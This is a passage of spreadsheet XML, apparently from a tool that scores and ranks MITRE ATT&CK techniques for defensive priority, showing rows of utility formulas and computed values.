        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I562" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J562" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K562" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L562" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M562" s="37">
        <v>0</v>
      </c>
      <c r="N562" s="56">
        <v>0</v>
      </c>
      <c r="O562" s="56">
        <v>0</v>
      </c>
      <c r="P562" s="56">
        <v>0</v>
      </c>
      <c r="Q562" s="56">
        <v>0</v>
      </c>
      <c r="R562" s="57" t="s">
        <v>1869</v>
      </c>
      <c r="S562" s="57">
        <v>2</v>
      </c>
      <c r="T562" s="57"/>
      <c r="U562" s="57">
        <v>0</v>
      </c>
      <c r="V562" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047809523809526E-2</v>
      </c>
      <c r="W562" s="37">
        <v>2</v>
      </c>
      <c r="X562" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Y562" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Z562" s="37">
        <v>0</v>
      </c>
      <c r="AA562" s="37">
        <v>0</v>
      </c>
      <c r="AB562" s="37">
        <v>0</v>
      </c>
      <c r="AC562" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD562" s="50"/>
      <c r="AE562" s="37" t="str" cm="1">
        <f t="array" ref="AE562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF562" s="37">
        <v>558</v>
      </c>
      <c r="AG562" s="37" t="str" cm="1">
        <f t="array" ref="AG562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH562" s="37">
        <v>558</v>
      </c>
      <c r="AI562" s="37" t="str" cm="1">
        <f t="array" ref="AI562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ562" s="37">
        <v>558</v>
      </c>
      <c r="AK562" s="37" t="str" cm="1">
        <f t="array" ref="AK562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL562" s="37">
        <v>558</v>
      </c>
      <c r="AM562" s="37" t="str" cm="1">
        <f t="array" ref="AM562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN562" s="37">
        <v>0</v>
      </c>
      <c r="AO562" s="37">
        <v>0</v>
      </c>
      <c r="AP562" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ562" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>51.394586222222223</v>
      </c>
      <c r="AR562" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS562" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT562" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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63" spans="1:47" ht="34">
      <c r="A563" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B563" s="37">
        <f t="shared" si="8"/>
        <v>154.45994990476191</v>
      </c>
      <c r="C563" s="37" t="s">
        <v>1879</v>
      </c>
      <c r="D563" s="50" t="s">
        <v>1868</v>
      </c>
      <c r="E563" s="37" t="s">
        <v>1880</v>
      </c>
      <c r="F563" s="37">
        <v>0</v>
      </c>
      <c r="G563" s="37">
        <v>1</v>
      </c>
      <c r="H563" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I563" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J563" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K563" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L563" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M563" s="37">
        <v>0</v>
      </c>
      <c r="N563" s="56">
        <v>0</v>
      </c>
      <c r="O563" s="56">
        <v>0</v>
      </c>
      <c r="P563" s="56">
        <v>0</v>
      </c>
      <c r="Q563" s="56">
        <v>0</v>
      </c>
      <c r="R563" s="57" t="s">
        <v>1869</v>
      </c>
      <c r="S563" s="57">
        <v>2</v>
      </c>
      <c r="T563" s="57"/>
      <c r="U563" s="57">
        <v>0</v>
      </c>
      <c r="V563" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047809523809526E-2</v>
      </c>
      <c r="W563" s="37">
        <v>2</v>
      </c>
      <c r="X563" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Y563" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Z563" s="37">
        <v>0</v>
      </c>
      <c r="AA563" s="37">
        <v>0</v>
      </c>
      <c r="AB563" s="37">
        <v>0</v>
      </c>
      <c r="AC563" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD563" s="50"/>
      <c r="AE563" s="37" t="str" cm="1">
        <f t="array" ref="AE563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF563" s="37">
        <v>559</v>
      </c>
      <c r="AG563" s="37" t="str" cm="1">
        <f t="array" ref="AG563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH563" s="37">
        <v>559</v>
      </c>
      <c r="AI563" s="37" t="str" cm="1">
        <f t="array" ref="AI563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ563" s="37">
        <v>559</v>
      </c>
      <c r="AK563" s="37" t="str" cm="1">
        <f t="array" ref="AK563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL563" s="37">
        <v>559</v>
      </c>
      <c r="AM563" s="37" t="str" cm="1">
        <f t="array" ref="AM563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN563" s="37">
        <v>0</v>
      </c>
      <c r="AO563" s="37">
        <v>0</v>
      </c>
      <c r="AP563" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ563" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>51.486649968253971</v>
      </c>
      <c r="AR563" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS563" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT563" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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64" spans="1:47" ht="34">
      <c r="A564" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B564" s="37">
        <f t="shared" si="8"/>
        <v>112.05000000000001</v>
      </c>
      <c r="C564" s="37" t="s">
        <v>1881</v>
      </c>
      <c r="D564" s="50" t="s">
        <v>1882</v>
      </c>
      <c r="E564" s="37"/>
      <c r="F564" s="37">
        <v>0</v>
      </c>
      <c r="G564" s="37">
        <v>1</v>
      </c>
      <c r="H564" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I564" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J564" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K564" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L564" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M564" s="37">
        <v>0</v>
      </c>
      <c r="N564" s="56">
        <v>0</v>
      </c>
      <c r="O564" s="56">
        <v>0</v>
      </c>
      <c r="P564" s="56">
        <v>0</v>
      </c>
      <c r="Q564" s="56">
        <v>0</v>
      </c>
      <c r="R564" s="57"/>
      <c r="S564" s="57">
        <v>0</v>
      </c>
      <c r="T564" s="57"/>
      <c r="U564" s="57">
        <v>0</v>
      </c>
      <c r="V564" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W564" s="37">
        <v>0</v>
      </c>
      <c r="X564" s="37">
        <v>0</v>
      </c>
      <c r="Y564" s="37">
        <v>0</v>
      </c>
      <c r="Z564" s="37">
        <v>0</v>
      </c>
      <c r="AA564" s="37">
        <v>0</v>
      </c>
      <c r="AB564" s="37">
        <v>0</v>
      </c>
      <c r="AC564" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD564" s="50"/>
      <c r="AE564" s="37" t="str" cm="1">
        <f t="array" ref="AE564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF564" s="37">
        <v>560</v>
      </c>
      <c r="AG564" s="37" t="str" cm="1">
        <f t="array" ref="AG564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH564" s="37">
        <v>560</v>
      </c>
      <c r="AI564" s="37" t="str" cm="1">
        <f t="array" ref="AI564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ564" s="37">
        <v>560</v>
      </c>
      <c r="AK564" s="37" t="str" cm="1">
        <f t="array" ref="AK564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL564" s="37">
        <v>560</v>
      </c>
      <c r="AM564" s="37" t="str" cm="1">
        <f t="array" ref="AM564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN564" s="37">
        <v>0</v>
      </c>
      <c r="AO564" s="37">
        <v>0</v>
      </c>
      <c r="AP564" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ564" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.35</v>
      </c>
      <c r="AR564" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS564" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT564" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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65" spans="1:47" ht="34">
      <c r="A565" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B565" s="37">
        <f t="shared" si="8"/>
        <v>112.25</v>
      </c>
      <c r="C565" s="37" t="s">
        <v>1883</v>
      </c>
      <c r="D565" s="50" t="s">
        <v>1882</v>
      </c>
      <c r="E565" s="37" t="s">
        <v>1884</v>
      </c>
      <c r="F565" s="37">
        <v>0</v>
      </c>
      <c r="G565" s="37">
        <v>1</v>
      </c>
      <c r="H565" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I565" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J565" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K565" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L565" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M565" s="37">
        <v>0</v>
      </c>
      <c r="N565" s="56">
        <v>0</v>
      </c>
      <c r="O565" s="56">
        <v>0</v>
      </c>
      <c r="P565" s="56">
        <v>0</v>
      </c>
      <c r="Q565" s="56">
        <v>0</v>
      </c>
      <c r="R565" s="57"/>
      <c r="S565" s="57">
        <v>0</v>
      </c>
      <c r="T565" s="57"/>
      <c r="U565" s="57">
        <v>0</v>
      </c>
      <c r="V565" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W565" s="37">
        <v>0</v>
      </c>
      <c r="X565" s="37">
        <v>0</v>
      </c>
      <c r="Y565" s="37">
        <v>0</v>
      </c>
      <c r="Z565" s="37">
        <v>0</v>
      </c>
      <c r="AA565" s="37">
        <v>0</v>
      </c>
      <c r="AB565" s="37">
        <v>0</v>
      </c>
      <c r="AC565" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD565" s="50"/>
      <c r="AE565" s="37" t="str" cm="1">
        <f t="array" ref="AE565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF565" s="37">
        <v>561</v>
      </c>
      <c r="AG565" s="37" t="str" cm="1">
        <f t="array" ref="AG565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH565" s="37">
        <v>561</v>
      </c>
      <c r="AI565" s="37" t="str" cm="1">
        <f t="array" ref="AI565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ565" s="37">
        <v>561</v>
      </c>
      <c r="AK565" s="37" t="str" cm="1">
        <f t="array" ref="AK565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL565" s="37">
        <v>561</v>
      </c>
      <c r="AM565" s="37" t="str" cm="1">
        <f t="array" ref="AM565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN565" s="37">
        <v>0</v>
      </c>
      <c r="AO565" s="37">
        <v>0</v>
      </c>
      <c r="AP565" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ565" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.416666666666664</v>
      </c>
      <c r="AR565" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS565" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT565" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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66" spans="1:47" ht="34">
      <c r="A566" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B566" s="37">
        <f t="shared" si="8"/>
        <v>112.45</v>
      </c>
      <c r="C566" s="37" t="s">
        <v>1885</v>
      </c>
      <c r="D566" s="50" t="s">
        <v>1882</v>
      </c>
      <c r="E566" s="37" t="s">
        <v>1886</v>
      </c>
      <c r="F566" s="37">
        <v>0</v>
      </c>
      <c r="G566" s="37">
        <v>1</v>
      </c>
      <c r="H566" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I566" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J566" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K566" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L566" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M566" s="37">
        <v>0</v>
      </c>
      <c r="N566" s="56">
        <v>0</v>
      </c>
      <c r="O566" s="56">
        <v>0</v>
      </c>
      <c r="P566" s="56">
        <v>0</v>
      </c>
      <c r="Q566" s="56">
        <v>0</v>
      </c>
      <c r="R566" s="57"/>
      <c r="S566" s="57">
        <v>0</v>
      </c>
      <c r="T566" s="57"/>
      <c r="U566" s="57">
        <v>0</v>
      </c>
      <c r="V566" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W566" s="37">
        <v>0</v>
      </c>
      <c r="X566" s="37">
        <v>0</v>
      </c>
      <c r="Y566" s="37">
        <v>0</v>
      </c>
      <c r="Z566" s="37">
        <v>0</v>
      </c>
      <c r="AA566" s="37">
        <v>0</v>
      </c>
      <c r="AB566" s="37">
        <v>0</v>
      </c>
      <c r="AC566" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD566" s="50"/>
      <c r="AE566" s="37" t="str" cm="1">
        <f t="array" ref="AE566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF566" s="37">
        <v>562</v>
      </c>
      <c r="AG566" s="37" t="str" cm="1">
        <f t="array" ref="AG566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH566" s="37">
        <v>562</v>
      </c>
      <c r="AI566" s="37" t="str" cm="1">
        <f t="array" ref="AI566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ566" s="37">
        <v>562</v>
      </c>
      <c r="AK566" s="37" t="str" cm="1">
        <f t="array" ref="AK566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL566" s="37">
        <v>562</v>
      </c>
      <c r="AM566" s="37" t="str" cm="1">
        <f t="array" ref="AM566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN566" s="37">
        <v>0</v>
      </c>
      <c r="AO566" s="37">
        <v>0</v>
      </c>
      <c r="AP566" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ566" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.483333333333334</v>
      </c>
      <c r="AR566" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS566" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT566" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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67" spans="1:47" ht="34">
      <c r="A567" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B567" s="37">
        <f t="shared" si="8"/>
        <v>112.65</v>
      </c>
      <c r="C567" s="37" t="s">
        <v>1887</v>
      </c>
      <c r="D567" s="50" t="s">
        <v>1882</v>
      </c>
      <c r="E567" s="37" t="s">
        <v>1888</v>
      </c>
      <c r="F567" s="37">
        <v>0</v>
      </c>
      <c r="G567" s="37">
        <v>1</v>
      </c>
      <c r="H567" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I567" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J567" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K567" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L567" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M567" s="37">
        <v>0</v>
      </c>
      <c r="N567" s="56">
        <v>0</v>
      </c>
      <c r="O567" s="56">
        <v>0</v>
      </c>
      <c r="P567" s="56">
        <v>0</v>
      </c>
      <c r="Q567" s="56">
        <v>0</v>
      </c>
      <c r="R567" s="57"/>
      <c r="S567" s="57">
        <v>0</v>
      </c>
      <c r="T567" s="57"/>
      <c r="U567" s="57">
        <v>0</v>
      </c>
      <c r="V567" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W567" s="37">
        <v>0</v>
      </c>
      <c r="X567" s="37">
        <v>0</v>
      </c>
      <c r="Y567" s="37">
        <v>0</v>
